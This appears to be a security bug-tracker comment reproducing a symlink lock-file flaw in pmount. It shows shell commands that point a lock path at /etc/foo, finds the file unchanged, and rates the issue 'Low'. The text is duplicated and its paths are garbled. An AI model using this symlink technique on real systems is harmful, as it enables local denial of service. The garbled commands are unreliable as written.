Dan, I can confirm this, but I don't see that pmount is altering the contents of the file if it already exists. Eg:
$ cat /etc/foo
test
$ stat /etc/foo
File: `/etc/foo'
Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000
I think I would characterize this as a 'Low' issue. A local attacker in the 'plugdev' group on Ubuntu could create things like /forcefsck or maybe fiddle with files in /var to DoS applications (eg, sockets, named pipes, etc).
Dan, I can confirm this, but I don't see that pmount is altering the contents of the file if it already exists. Eg:
$ cat /etc/foo
test
$ stat /etc/foo
File: `/etc/foo'
Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000
$ mkdir /var/lock/ pmount_ dev_sr0 pmount_ dev_sr0/ pmount_ dev_sr0/
$ ls -ld /var/lock/
drwxr-xr-x 2 jamie jamie 40 2010-06-05 12:12 /var/lock/
$ ln -s /etc/foo /var/lock/ pmount_ dev_sr0/ 1 pmount_ dev_sr0/ 1 pmount_ dev_sr0/ 1 -> /etc/foo
$ ls -l /var/lock/
lrwxrwxrwx 1 jamie jamie 8 2010-06-05 12:13 /var/lock/
$ pmount --lock /dev/sr0 1
$ cat /etc/foo
test
$ stat /etc/foo
File: `/etc/foo'
Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000
I think I would characterize this as a 'Low' issue. A local attacker in the 'plugdev' group on Ubuntu could create things like /forcefsck or maybe fiddle with files in /var to DoS applications (eg, sockets, named pipes, etc).